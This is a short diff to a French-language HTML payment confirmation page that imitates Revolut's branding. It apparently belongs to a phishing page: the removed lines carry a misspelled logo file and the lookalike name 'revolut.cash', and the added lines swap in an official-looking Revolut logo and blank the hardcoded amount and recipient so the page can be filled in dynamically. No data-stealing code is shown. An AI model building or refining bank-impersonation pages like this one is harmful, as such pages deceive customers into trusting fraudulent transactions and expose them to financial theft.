--- a/traitement2.html
+++ b/traitement2.html
@@ -214,8 +214,8 @@
     <!-- Header -->
     <header class="revolut-header">
         <div class="revolut-logo">
-            <img src="revotut.img" alt="Revolut" class="revolut-logo-img">
-            <span class="revolut-logo-text">revolut.cash</span>
+            <img src="Revolut-Logo.wine.png" alt="Revolut" class="revolut-logo-img">
+            <span class="revolut-logo-text"></span>
         </div>
     </header>
 
@@ -238,11 +238,11 @@
             <div class="revolut-success-details animate-fade-in" style="animation-delay: 0.4s;">
                 <div class="revolut-detail-row">
                     <span class="revolut-detail-label">Montant:</span>
-                    <span class="revolut-detail-value">€150.00</span>
+                    <span class="revolut-detail-value"></span>
                 </div>
                 <div class="revolut-detail-row">
                     <span class="revolut-detail-label">Destinataire:</span>
-                    <span class="revolut-detail-value">Amazon EU</span>
+                    <span class="revolut-detail-value"></span>
                 </div>
                 <div class="revolut-detail-row">
                     <span class="revolut-detail-label">Date:</span>
